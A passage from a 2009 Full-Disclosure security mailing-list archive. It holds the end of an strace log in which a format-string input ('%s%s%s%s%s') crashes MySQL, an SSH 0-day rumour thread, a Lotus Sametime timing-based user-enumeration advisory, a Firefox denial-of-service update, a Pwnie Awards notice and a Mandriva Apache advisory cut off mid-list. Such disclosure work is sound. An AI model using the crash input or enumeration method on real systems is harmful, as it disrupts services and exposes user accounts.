~[RTMIN RT_1], [HUP INT QUIT PIPE ALRM TERM TSTP], 8) = 0 16147 tgkill(26453, 26462, SIGALRM) = 0 16147 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP], NULL, 8) = 0 16147 fcntl64(26, F_SETFL, O_RDWR) = 0 16147 read(26, 26462 <... rt_sigtimedwait resumed> 0, 0, 8) = 14 16147 <... read resumed> "\v\0\0\0", 4) = 4 16147 read(26, "\5%s%s%s%s%s", 11) = 11 16147 rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [HUP INT QUIT PIPE ALRM TERM TSTP], 8) = 0 16147 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP], NULL, 8) = 0 16147 fcntl64(26, F_SETFL, O_RDWR|O_NONBLOCK) = 0 16147 time(NULL) = 1245456547 16147 --- SIGSEGV (Segmentation fault) @ 0 (0) --- 16147 time(NULL) = 1245456547 16147 write(2, "090620 2:09:07 - mysqld got sig"..., 266) = 266 16147 write(2, "We will try our best to scrape u"..., 176) = 176 16147 write(2, "key_buffer_size=8388600\n", 24) = 24 16147 write(2, "read_buffer_size=131072\n", 24) = 24 16147 write(2, "max_used_connections=1\n", 23) = 23 16147 write(2, "max_connections=100\n", 20) = 20 16147 write(2, "threads_connected=1\n", 20) = 20 16147 write(2, "It is possible that mysqld could"..., 143) = 143 16147 write(2, "Hope that\'s ok; if not, decrease"..., 66) = 66 16147 write(2, "thd=0x8aea8a8\n", 14) = 14 16147 write(2, "Attempting backtrace. You can us"..., 159) = 159 16147 write(2, "Cannot determine thread, fp=0xb0"..., 70) = 70 16147 write(2, "Stack range sanity check OK, bac"..., 48) = 48 16147 write(2, "0x8187393\n", 10) = 10 16147 write(2, "0xb7be8afb\n", 11) = 11 16147 write(2, "0x8208dc4\n", 10) = 10 16147 write(2, "0x81a55e2\n", 10) = 10 16147 write(2, "0x81a58b7\n", 10) = 10 16147 write(2, "0x81a6487\n", 10) = 10 16147 write(2, "0xb7e2a33a\n", 11) = 11 16147 write(2, "0xb7c4b5ce\n", 11) = 11 16147 write(2, "New value of fp=(nil) failed san"..., 68) = 68 16147 write(2, "Please read http://dev.mysql.com"..., 222) = 222 16147 write(2, "Trying to get some variables.\nSo"..., 90) = 90 16147 write(2, "thd->query at (nil) ", 20) = 20 16147 write(2, " is invalid pointer\n", 20) = 20 16147 write(2, "thd->thread_id=1\n", 17) = 17 16147 write(2, "The manual page at http://www.my"..., 139) = 139 16147 exit_group(1) = ? 26462 rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1], 26463 <... futex resumed> ) = -1 EINTR (Interrupted system call) 26459 <... select resumed> ) = ? ERESTARTNOHAND (To be restarted) 26453 <... select resumed> ) = ? ERESTARTNOHAND (To be restarted) 26454 <... futex resumed> ) = -1 EINTR (Interrupted system call) 26455 <... futex resumed> ) = -1 EINTR (Interrupted system call) 26456 <... futex resumed> ) = -1 EINTR (Interrupted system call) 26457 <... futex resumed> ) = -1 EINTR (Interrupted system call) 26461 <... futex resumed> ) = -1 EINTR (Interrupted system call) 26460 <... select resumed> ) = ? ERESTARTNOHAND (To be restarted) 26462 <... rt_sigprocmask resumed> [HUP INT QUIT PIPE ALRM TERM TSTP], 8) = 0 With Kind Regards, Nikolaos Rangos E-Mail: kcope[at]googlemail.com -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: MySQL_Format.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090709/39bc0507/attachment.txt From frank2 at dc949.org Thu Jul 9 00:09:31 2009 From: frank2 at dc949.org (frank^2) Date: Wed, 8 Jul 2009 16:09:31 -0700 Subject: [Full-disclosure] [Rumor] SSH 0-day In-Reply-To: <527eb3030907081358i7047bfacodb039ad0905af2ce@mail.gmail.com> References: <1247083217.11750.14.camel@kr0sty.livra.local> <527eb3030907081358i7047bfacodb039ad0905af2ce@mail.gmail.com> Message-ID: <8d79f4b50907081609v364b51ft19b4b647ab161c31@mail.gmail.com> On Wed, Jul 8, 2009 at 1:58 PM, Anderson Kaiser wrote: > 2009/7/8 Martin Spinassi : >> Hi list, >> >> >> I've been reading around (openssh mailing list, some forums, etc.) a >> rumor about a 0-day exploit in openssh. Does anybody knows if there is >> *really* something like this in the wild? >> >> >> Cheers >> >> >> Martin >> > > This attack sounds more like a brute-force attack than a 0-day. You > can see it in the original post. There's also the ominous anonymous comment left by a fellow on a blog: http://isc.sans.org/diary.html?storyid=6742 The significant stuff: "Expect the SSH exploit to be made public before BH/DC. I have proof that I can't share (sorry), that this exploit does exist, does not work against current versions of SSH, and is actively being used by members of the anti-sec movement." Signs seem to be pointing to hoax, old exploit or non-exploit, though. Unfortunately there's really not quite enough information to make an assessment yet, IMHO. From lists at senseofsecurity.com.au Thu Jul 9 07:29:16 2009 From: lists at senseofsecurity.com.au (Lists) Date: Thu, 9 Jul 2009 16:29:16 +1000 Subject: [Full-disclosure] =?iso-8859-1?q?Lotus_Sametime_User_Enumeration_?= =?iso-8859-1?q?Vulnerability_-_Security_Advisory_-_SOS-09-004?= Message-ID: Lotus Sametime User Enumeration Vulnerability - Security Advisory - SOS-09-004 Release Date. 9-Jul-2009 Vendor Notification Date. 2-Jun-2009 Product. IBM Lotus Instant Messaging and Web Conferencing (Sametime) Platform. Windows (verified), possibly others Affected versions. IBM Lotus Instant Messaging and Web Conferencing (Sametime) 6.5.1 (verified), possibly others Severity Rating. Low Impact. Exposure of sensitive information Attack Vector. Remote without authentication Solution Status. Vendor patch not yet available CVE reference. Not yet allocated Details. IBM Lotus Sametime is an enterprise instant messaging and web conferencing application. During an application penetration test Sense of Security identified a user enumeration vulnerability when trying to connect to the Sametime server using the Sametime Connect Client. This occurred as a result of varying response times depending on whether or not a valid user name is supplied. The client takes significantly longer to display the 'Invalid logon' error message when a valid username (and invalid password) is provided (5-8 seconds). This is a result of additional information exchanges occurring between the server and client. When an invalid username (and password) is supplied, the error is displayed almost instantaneously (1-3 seconds). This can be used to enumerate valid user names. Solution. The vendor has advised that IBM is looking to eliminate this behaviour completely in a future release. Discovered by. Karan Khosla from SOS Labs. About us. Sense of Security is a leading provider of IT security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application security consultancy and trusted IT security advisor to many of the countries largest organisations. Sense of Security Pty Ltd Level 3, 66 King St Sydney NSW 2000 AUSTRALIA T: +61 (0)2 9290 4444 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au E: info at senseofsecurity.com.au The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-09-004.pdf Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php From kaspar.m at gmx.com Thu Jul 9 10:46:01 2009 From: kaspar.m at gmx.com (Kaspar Mendev) Date: Thu, 09 Jul 2009 11:46:01 +0200 Subject: [Full-disclosure] [Rumor] SSH 0-day Message-ID: <20090709094601.240530@gmx.com> -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090709/3ef36612/attachment.html From Thierry at Zoller.lu Thu Jul 9 11:19:47 2009 From: Thierry at Zoller.lu (Thierry Zoller) Date: Thu, 9 Jul 2009 12:19:47 +0200 Subject: [Full-disclosure] Update: [TZO-27-2009] Firefox Denial of Service (Keygen) Message-ID: <1309593173.20090709121947@Zoller.lu> Update ------ Unfortunately the Denial of Service condition has not been fixed with the new versions/builds and according to tickets filled under the bugzilla ID the impact of this bug has changed since version 3.5. [1] Hence the list of affected products now is : - All versions below Firefox 3.5 [1] --- Comment #28 from PBForeman 2009-07-08 09:14:00 PDT --- When FF3.5 is open, cpu eventually runs 99%, using over 100,000K of memory. Closing FF does not stop the cpu or memory usage. Closing with Task Manager is the only way to exit FF. Previous versions of FF all ran stable, problem started with 3.5. Closing and restarting does not solve the problem. Removing program and reinstalling clean does not solve anything. Same settings were used from previous version to install FF3.5. Once cpu maxes out, FF ties up entire computer. From alex at sotirov.net Thu Jul 9 03:43:45 2009 From: alex at sotirov.net (Alexander Sotirov) Date: Wed, 8 Jul 2009 22:43:45 -0400 Subject: [Full-disclosure] Pwnie Awards 2009 Message-ID: <20090709024345.GA20585@MacBook.local> The Pwnie Awards ceremony will return for the third consecutive year to the BlackHat USA conference in Las Vegas. The award ceremony will take place during the BlackHat reception on Wed, July 29. The Pwnie Awards is an annual awards ceremony celebrating the achievements and failures of security researchers and the wider security community in the past year. We're currently accepting nominations in nine award categories: * Best Server-Side Bug * Best Client-Side Bug * Mass 0wnage * Most Innovative Research * Lamest Vendor Response * Most Overhyped Bug * Best Song * Most Epic FAIL (new for 2008) * Lifetime Achievement award for hackers over 30 (new for 2008) The deadline for nominations is Wed, July 15. To submit a nomination, visit the Pwnie Awards site at http://pwnie-awards.org/ For more last minute information, follow @PwnieAwards on Twitter, http://twitter.com/PwnieAwards For questions, please email info at pwnie-awards.org Alexander Sotirov Dino Dai Zovi Pwnie Awards 2009 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 194 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090708/9d6c1dc0/attachment.bin From nytrokiss at gmail.com Thu Jul 9 15:55:40 2009 From: nytrokiss at gmail.com (James Matthews) Date: Thu, 9 Jul 2009 17:55:40 +0300 Subject: [Full-disclosure] [Rumor] SSH 0-day In-Reply-To: <20090709094601.240530@gmx.com> References: <20090709094601.240530@gmx.com> Message-ID: <8a6b8e350907090755r6edd8fd2n14ed68e477ae2a22@mail.gmail.com> I am worried that if it is an OpenSSH 0day how much damage should I expect. However SANS doesn't seem to think it's real. James On Thu, Jul 9, 2009 at 12:46 PM, Kaspar Mendev wrote: > See also their update http://isc.sans.org/diary.html?storyid=6760 > > > Though like frank^2 says, we'll see what we'll see. > > > > ----- Original Message ----- > > From: frank^2 > > Sent: 07/09/09 01:09 am > > To: Anderson Kaiser > > Subject: Re: [Full-disclosure] [Rumor] SSH 0-day > > > On Wed, Jul 8, 2009 at 1:58 PM, Anderson Kaiser wrote: > > 2009/7/8 Martin Spinassi : > >> Hi list, > >> > >> > >> I've been reading around (openssh mailing list, some forums, etc.) a > >> rumor about a 0-day exploit in openssh. Does anybody knows if there is > >> *really* something like this in the wild? > >> > >> > >> Cheers > >> > >> > >> Martin > >> > > > > This attack sounds more like a brute-force attack than a 0-day. You > > can see it in the original post. > > There's also the ominous anonymous comment left by a fellow on a blog: > http://isc.sans.org/diary.html?storyid=6742 > > The significant stuff: "Expect the SSH exploit to be made public > before BH/DC. I have proof that I can't share (sorry), that this > exploit does exist, does not work against current versions of SSH, and > is actively being used by members of the anti-sec movement." > > Signs seem to be pointing to hoax, old exploit or non-exploit, though. > Unfortunately there's really not quite enough information to make an > assessment yet, IMHO. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090709/d63e43a0/attachment.html From security at mandriva.com Thu Jul 9 16:16:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 09 Jul 2009 17:16:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:149 ] apache Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:149 http://www.mandriva.com/security/ _______________________________________________________________________ Package : apache Date : July 9, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in apache: The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests (CVE-2009-1890). Fix a potential Denial-of-Service attack against mod_deflate or other modules, by forcing the server to consume CPU time in compressing a large file after a client disconnects (CVE-2009-1891). This update provides fixes for these vulnerabilities. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1890 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1891 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 864257e773e8847901aa0f2e7b92e35c 2008.1/i586/apache-base-2.2.8-6.5mdv2008.1.i586.rpm 2ef1924cb3803af418dcb0e12b05da5a 2008.1/i586/apache-devel-2.2.8-6.5mdv2008.1.i586.rpm a3ec4a3eda586d7b52e65e0dc715e96b 2008.1/i586/apache-htcacheclean-2.2.8-6.5mdv2008.1.i586.rpm ad46ee6bd081b35e89bf00b707e34e66 2008.1/i586/apache-mod_authn_dbd-2.2.8-6.5mdv2008.1.i586.rpm 1500f492f8aa95f82ce8062fb79371bf 2008.1/i586/apache-mod_cache-2.2.8-6.5mdv2008.1.i586.rpm 0bcf1f2cc7c220a5fcbe212e8d4c791a 2008.1/i586/apache-mod_dav-2.2.8-6.5mdv2008.1.i586.rpm f50830d873e8a948ebb7435068ac7723 2008.1/i586/apache-mod_dbd-2.2.8-6.5mdv2008.1.i586.rpm 53e657db85cbbb5a46991b7a7e7ba6eb 2008.1/i586/apache-mod_deflate-2.2.8-6.5mdv2008.1.i586.rpm 0de02351654d1691aca8027fcd162076 2008.1/i586/apache-mod_disk_cache-2.2.8-6.5mdv2008.1.i586.rpm 9b8cb72ea384949d1afdb2a458edde43 2008.1/i586/apache-mod_file_cache-2.2.8-6.5mdv2008.1.i586.rpm b01299df82912bd055e8a4a5107f18ba 2008.1/i586/apache-mod_ldap-2.2.8-6.5mdv2008.1.i586.rpm de8b3be73e223946bc59267b2b061041 2008.1/i586/apache-mod_mem_cache-2.2.8-6.5mdv2008.1.i586.rpm f8d35075b25dfa8349e1a4903d17751b 2008.1/i586/apache-mod_proxy-2.2.8-6.5mdv2008.1.i586.rpm 0c16a26c9c164197211a13c4ffcc3b33 2008.1/i586/apache-mod_proxy_ajp-2.2.8-6.5mdv2008.1.i586.rpm d70ff82e41072270e0f6af937d06ee9b 2008.1/i586/apache-mod_ssl-2.2.8-6.5mdv2008.1.i586.rpm 05c16bce9cefcb99c1db3834f6853f89 2008.1/i586/apache-modules-2.2.8-6.5mdv2008.1.i586.rpm 8e3ee38379f1e301a1e41a489a92147b 2008.1/i586/apache-mod_userdir-2.2.8-6.5mdv2008.1.i586.rpm a3ff073681b969b46638ff46a6313fc6 2008.1/i586/apache-mpm-event-2.2.8-6.5mdv2008.1.i586.rpm c89bb0192cc036054e3a4367fababce1 2008.1/i586/apache-mpm-itk-2.2.8-6.5mdv2008.1.i586.rpm 410f034dd2818b264a09a036bd35f9a2 2008.1/i586/apache-mpm-prefork-2.2.8-6.5mdv2008.1.i586.rpm 476303bf479cc1c249b6fa69f32742d2 2008.1/i586/apache-mpm-worker-2.2.8-6.5mdv2008.1.i586.rpm 23ef5826c0e49f577d8d04254f61a923 2008.1/i586/apache-source-2.2.8-6.5mdv2008.1.i586.rpm 5d895c7c364db08fff0372c3654d1ccd 2008.1/SRPMS/apache-2.2.8-6.5mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: ed8541532eb77b813ec71f35bc3b1a7f 2008.1/x86_64/apache-base-2.2.8-6.5mdv2008.1.x86_64.rpm 98000923f5eec7c767dafd94ab0967bc 2008.1/x86_64/apache-devel-2.2.8-6.5mdv2008.1.x86_64.rpm 7c81d6ed41e96370e3c4498a6a082714 2008.1/x86_64/apache-htcacheclean-2.2.8-6.5mdv2008.1.x86_64.rpm 074ce4664eb6fc96f0444de96bdd17cf 2008.1/x86_64/apache-mod_authn_dbd-2.2.8-6.5mdv2008.1.x86_64.rpm 8306c6084cabfd7e36207a53489093df 2008.1/x86_64/apache-mod_cache-2.2.8-6.5mdv2008.1.x86_64.rpm eaf9d071b93a0f478e242253b031c2bd 2008.1/x86_64/apache-mod_dav-2.2.8-6.5mdv2008.1.x86_64.rpm d02221dbdac77e5fa1ee1710f5e946dd 2008.1/x86_64/apache-mod_dbd-2.2.8-6.5mdv2008.1.x86_64.rpm 574bb4b1e11c16210e99be0ce029aa10 2008.1/x86_64/apache-mod_deflate-2.2.8-6.5mdv2008.1.x86_64.rpm c3196491613788da66c222dfd1d7608e 2008.1/x86_64/apache-mod_disk_cache-2.2.8-6.5mdv2008.1.x86_64.rpm 9eeb2a7b68bc178dc7917c362d89b5ff 2008.1/x86_64/apache-mod_file_cache-2.2.8-6.5mdv2008.1.x86_64.rpm 5dfc3a189d4e70dde834a84c3a5141fa 2008.1/x86_64/apache-mod_ldap-2.2.8-6.5mdv2008.1.x86_64.rpm 66696247e7ae1a919e0e80fa43544b92 2008.1/x86_64/apache-mod_mem_cache-2.2.8-6.5mdv2008.1.x86_64.rpm 6374972abfd91ab03fe74ac0b9b5fbbd 2008.1/x86_64/apache-mod_proxy-2.2.8-6.5mdv2008.1.x86_64.rpm 6606ff6d4ae5d09716a69938e2b944c6 2008.1/x86_64/apache-mod_proxy_ajp-2.2.8-6.5mdv2008.1.x86_64.rpm 23ba0203d6876a376e1a1e22e887b54c 2008.1/x86_64/apache-mod_ssl-2.2.8-6.5mdv2008.1.x86_64.rpm b7077a42c6b823d7a744e5ecbe306242 2008.1/x86_64/apache-modules-2.2.8-6.5mdv2008.1.x86_64.rpm fa1ab5a1c4190191c88fb83bf07d3926 2008.1/x86_64/apache-mod_userdir-2.2.8-6.5mdv2008.1.x86_64.rpm abb9e82feea59e2d913dab61c0c1be2f 2008.1/x86_64/apache-mpm-event-2.2.8-6.5mdv2008.1.x86_64.rpm a7e021179bcabb2e6725d7488fac33cf 2008.1/x86_64/apache-mpm-itk-2.2.8-6.5mdv2008.1.x86_64.rpm 64ec4ecc7f6f6557eb95ba61017e00a8 2008.1/x86_64/apache-mpm-prefork-2.2.8-6.5mdv2008.1.x86_64.rpm 5955bfd23bfff88bea08d049bbf1ff88 2008.1/x86_64/apache-mpm-worker-2.2.8-6.5mdv2008.1.x86_64.rpm 91e233e5e4874e2beaa6eff728d1a8df 2008.1/x86_64/apache-source-2.2.8-6.5mdv2008.1.x86_64.rpm 5d895c7c364db08fff0372c3654d1ccd 2008.1/SRPMS/apache-2.2.8-6.5mdv2008.1.src.rpm Mandriva Linux 2009.0: d363852286bffcc1f16be74529c16d8e 2009.0/i586/apache-base-2.2.9-12.3mdv2009.0.i586.rpm 5958b4410e39655375a3fb06704e86cb 2009.0/i586/apache-devel-2.2.9-12.3mdv2009.0.i586.rpm 0d57fe115977bdb79f5550f68e6f0a7c 2009.0/i586/apache-htcacheclean-2.2.9-12.3mdv2009.0.i586.rpm 4d3907f8abc34e0398d2a67df9185f1e 2009.0/i586/apache-mod_authn_dbd-2.2.9-12.3mdv2009.0.i586.rpm 3cf8641644943ef13cff4b6af29cfacb 2009.0/i586/apache-mod_cache-2.2.9-12.3mdv2009.0.i586.rpm 8adb06cd1b0c1364c30c761c49b50d33 2009.0/i586/apache-mod_dav-2.2.9-12.3mdv2009.0.i586.rpm a0bfc1e6a7d9f8862c65c69f759cd093 2009.0/i586/apache-mod_dbd-2.2.9-12.3mdv2009.0.i586.rpm b335c39fe37988f3de26537262dd6b9d 2009.0/i586/apache-mod_deflate-2.2.9-12.3mdv2009.0.i586.rpm f3e11730ca6381f782f60ea7ad703b33 2009.0/i586/apache-mod_disk_cache-2.2.9-12.3mdv2009.0.i586.rpm 8ec10efb81f40dd11e744856a30f1a9e 2009.0/i586/apache-mod_file_cache-2.2.9-12.3mdv2009.0.i586.rpm ca822b5f7ce60c3b2e8ac8ef9c87ea07 2009.0/i586/apache-mod_ldap-2.2.9-12.3mdv2009.0.i586.rpm 6ef2fe37d9056fd08fe10f17f72eb131 2009.0/i586/apache-mod_mem_cache-2.2.9-12.3mdv2009.0.i586.rpm 17e4a0cb1a25f1a1dd34d64527cd69ff 2009.0/i586/apache-mod_proxy-2.2.9-12.3mdv2009.0.i586.rpm f757375865df48bde5fde177bc53f176 2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.3mdv2009.0.i586.rpm afa87773aa3485eb3d08482f6c66b723 2009.0/i586/apache-mod_ssl-2.2.9-12.3mdv2009.0.i586.rpm b9b4cebe20f782cf6d61de932ae775fe 2009.0/i586/apache-modules-2.2.9-12.3mdv2009.0.i586.rpm 7caa399d860dce728c05e2a1bbb37b02 2009.0/i586/apache-mod_userdir-2.2.9-12.3mdv2009.0.i586.rpm 991dcf92749cedff7f2b7ea110cbc26d 2009.0/i586/apache-mpm-event-2.2.9-12.3mdv2009.0.i586.rpm 6631e8492a2cfb0c294a844d4437896b 2009.0/i586/apache-mpm-itk-2.2.9-12.3mdv2009.0.i586.rpm 334050ac21bee98ba6cb3275f378c07f 2009.0/i586/apache-mpm-peruser-2.2.9-12.3mdv2009.0.i586.rpm 616f75510fbf462edf494fdf6456f2f0 2009.0/i586/apache-mpm-prefork-2.2.9-12.3mdv2009.0.i586.rpm ec4bc21290ccb97b3f4a89fe395f961e 2009.0/i586/apache-mpm-worker-2.2.9-12.3mdv2009.0.i586.rpm fd5db56435be568aa94e4f256f083640 2009.0/i586/apache-source-2.2.9-12.3mdv2009.0.i586.rpm befd4b86100340246045938e9668b133 2009.0/SRPMS/apache-2.2.9-12.3mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 12bb10b4fefbe9a41290619b396bbc27 2009.0/x86_64/apache-base-2.2.9-12.3mdv2009.0.x86_64.rpm f9480a489f5fc7bf6f09601c66786166 2009.0/x86_64/apache-devel-2.2.9-12.3mdv2009.0.x86_64.rpm 194e19c4192104e1ce86ccae92bc3678 2009.0/x86_64/apache-htcacheclean-2.2.9-12.3mdv2009.0.x86_64.rpm 83df7eff4ccf56a27dfab4b7e5e55def 2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.3mdv2009.0.x86_64.rpm 7e17cd33c2f77598a55b27de9a1f272f 2009.0/x86_64/apache-mod_cache-2.2.9-12.3mdv2009.0.x86_64.rpm 49b4f14a69e1fe814892d8c1235fff3b 2009.0/x86_64/apache-mod_dav-2.2.9-12.3mdv2009.0.x86_64.rpm 51bf4942dcdfce90ca8d921fcf721d20 2009.0/x86_64/apache-mod_dbd-2.2.9-12.3mdv2009.0.x86_64.rpm 1b95ecf1dd6d8509d764428c2f64f023 2009.0/x86_64/apache-mod_deflate-2.2.9-12.3mdv2009.0.x86_64.rpm 2a269581f79f4261357d78c3a32f5ac9 2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.3mdv2009.0.x86_64.rpm b471904247a8663f8894956b02bd3095 2009.0/x86_64/apache-mod_file_cache-2.2.9-12.3mdv2009.0.x86_64.rpm 2f9667e46b23c991813607a53310e5d8 2009.0/x86_64/apache-mod_ldap-2.2.9-12.3mdv2009.0.x86_64.rpm 184b807180f72d4399a4039f6f08d7d8 2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.3mdv2009.0.x86_64.rpm cfc41078bac18b0512a44756eb31c727 2009.0/x86_64/apache-mod_proxy-2.2.9-12.3mdv2009.0.x86_64.rpm 4d7e1318e9ca104dce782997d94734f3 2009.0/x86_64/apache-mod_proxy_ajp-2.2.9-12.3mdv2009.0.x86_64.rpm d3613cf215e1617d53761395591c0ee5 2009.0/x86_64/apache-mod_ssl-2.2.9-12.3mdv2009.0.x86_64.rpm 663d9a17a0a131c46ad70aebb9d286a1 2009.0/x86_64/apache-modules-2.2.9-12.3mdv2009.0.x86_64.rpm 4b88b69bb42109d60ed86b3aa0cf6cf0 2009.0/x86_64/apache-mod_userdir-2.2.9-12.3mdv2009.0.x86_64.rpm c0212892e5ccc905bf9c8c27c0fc55a4 2009.0/x86_64/apache-mpm-event-2.2.9-12.3mdv2009.0.x86_64.rpm 845a766d32686438a04562898d658f66 2009.0/x86_64/apache-mpm-itk-2.2.9-12.3mdv2009.0.x86_64.rpm d841f9b7e7898e99f16ecc668a829890 2009.0/x86_64/apache-mpm-peruser-2.2.9-12.3mdv2009.0.x86_64.rpm 55bb3d32f6ad363872d9c27e6eab04a6 2009.0/x86_64/apache-mpm-prefork-2.2.9-12.3mdv2009.0.x86_64.rpm 2ace6623bedb6f5d29d8b79505361ef1 2009.0/x86_64/apache-mpm-worker-2.2.9-12.3mdv2009.0.x86_64.rpm aa3f27740d94b8d2ada54592b3c1deb2 2009.0/x86_64/apache-source-2.2.9-12.3mdv2009.0.x86_64.rpm befd4b86100340246045938e9668b133 2009.0/SRPMS/apache-2.2.9-12.3mdv2009.0.src.rpm Mandriva Linux 2009.1: 43de323093117584b6f981e3440893d9 2009.1/i586/apache-base-2.2.11-10.4mdv2009.1.i586.rpm e4a751411c51ebf3db63c5a70ba555ee 2009.1/i586/apache-devel-2.2.11-10.4mdv2009.1.i586.rpm b013be5a696f29cdd2c0c6da0799dd08 2009.1/i586/apache-htcacheclean-2.2.11-10.4mdv2009.1.i586.rpm 672318a22cff862b606d6f1721650a9b 2009.1/i586/apache-mod_authn_dbd-2.2.11-10.4mdv2009.1.i586.rpm cd318fc1bf8be7106f1c92f0e23f2faa 2009.1/i586/apache-mod_cache-2.2.11-10.4mdv2009.1.i586.rpm f8354758215da0db366c942bde4465fe 2009.1/i586/apache-mod_dav-2.2.11-10.4mdv2009.1.i586.rpm d04f091350b5737c35217b3963cdba21 2009.1/i586/apache-mod_dbd-2.2.11-10.4mdv2009.1.i586.rpm 94ba7bfec4c32d194a157ae285cbfbe6 2009.1/i586/apache-mod_deflate-2.2.11-10.4mdv2009.1.i586.rpm fed83efa0e9315b5f6060535424046fd 2009.1/i586/apache-mod_disk_cache-2.2.11-10.4mdv2009.1.i586.rpm 1b9b91a3a25036edfebe5bcd7f603fd5 2009.1/i586/apache-mod_file_cache-2.2.11-10.4mdv2009.1.i586.rpm f9b090f9e1d5303171884ef6972232e7 2009.1/i586/apache-mod_ldap-2.2.11-10.4mdv2009.1.i586.rpm 7af5d73ac41cf7d8f54251e0d14a6eed 2009.1/i586/apache-mod_mem_cache-2.2.11-10.4mdv2009.1.i586.rpm 509e9bedb5f91343a676045f90bef558 2009.1/i586/apache-mod_proxy-2.2.11-10.4mdv2009.1.i586.rpm 0c68c2755ad96c79f85a155bc079dd74 2009.1/i586/apache-mod_proxy_ajp-2.2.11-10.4mdv2009.1.i586.rpm fdd37129c8ce847680456f5c08550968 2009.1/i586/apache-mod_ssl-2.2.11-10.4mdv2009.1.i586.rpm 7549e14f72e5c8d3d6b408d52ef8a38c 2009.1/i586/apache-modules-2.2.11-10.4mdv2009.1.i586.rpm bc066f7e9cd881dfc170953094dc8319 2009.1/i586/apache-mod_userdir-2.2.11-10.4mdv2009.1.i586.rpm d32db804ae96533ca4c7b245eda01f98 2009.1/i586/apache-mpm-event-2.2.11-10.4mdv2009.1.i586.rpm 868f2aaa6ef53c7c60b376202944e2aa 2009.1/i586/apache-mpm-itk-2.2.11-10.4mdv2009.1.i586.rpm 681854ce611a93ec864c58785ab541f5 2009.1/i586/apache-mpm-peruser-2.2.11-10.4mdv2009.1.i586.rpm 8e71ace64ffd0c8c37c83a0a12e1afbe 2009.1/i586/apache-mpm-prefork-2.2.11-10.4mdv2009.1.i586.rpm 5e88459f25f50a6c3cde05a445b32594 2009.1/i586/apache-mpm-worker-2.2.11-10.4mdv2009.1.i586.rpm 611db0cf3570f9f0377586bda61e59b0 2009.1/i586/apache-source-2.2.11-10.4mdv2009.1.i586.rpm 6e8db38ec06bfd8756037dec8ea71ca4 2009.1/SRPMS/apache-2.2.11-10.4mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: f140d32d2a4083fb5ee324b7572279f2 2009.1/x86_64/apache-base-2.2.11-10.4mdv2009.1.x86_64.rpm 383bab22e1d9a9c61baeb10c3972443d 2009.1/x86_64/apache-devel-2.2.11-10.4mdv2009.1.x86_64.rpm 007f4193dc68dcd34d48ab58bfd615ed 2009.1/x86_64/apache-htcacheclean-2.2.11-10.4mdv2009.1.x86_64.rpm 428b7be1ac06755588bb28dc90b914ae 2009.1/x86_64/apache-mod_authn_dbd-2.2.11-10.4mdv2009.1.x86_64.rpm 82158b3767bdb31fea07f5a442fcebd4 2009.1/x86_64/apache-mod_cache-2.2.11-10.4mdv2009.1.x86_64.rpm 085eb05ff541f4699b0d2764b24c023a 2009.1/x86_64/apache-mod_dav-2.2.11-10.4mdv2009.1.x86_64.rpm 7b831282bf0889312f8198c358393332 2009.1/x86_64/apache-mod_dbd-2.2.11-10.4mdv2009.1.x86_64.rpm f78e3d86a7b6af8b46c1864fcabd5455 2009.1/x86_64/apache-mod_deflate-2.2.11-10.4mdv2009.1.x86_64.rpm b985d6447095085c7713902a7253dc07 2009.1/x86_64/apache-mod_disk_cache-2.2.11-10.4mdv2009.1.x86_64.rpm 26e49e2067e11ea114dc8ddcac3d51c6 2009.1/x86_64/apache-mod_file_cache-2.2.11-10.4mdv2009.1.x86_64.rpm e4395af2defe1b01229fe1c4887a5e3b 2009.1/x86_64/apache-mod_ldap-2.2.11-10.4mdv2009.1.x86_64.rpm 08c9824c79e51e956619dd1c1f5b2391 2009.1/x86_64/apache-mod_mem_cache-2.2.11-10.4mdv2009.1.x86_64.rpm 125634357057ef66b5a96c3f6d59f887 2009.1/x86_64/apache-mod_proxy-2.2.11-10.4mdv2009.1.x86_64.rpm 48f5cce6d04c185bc8f74e9440d42d49 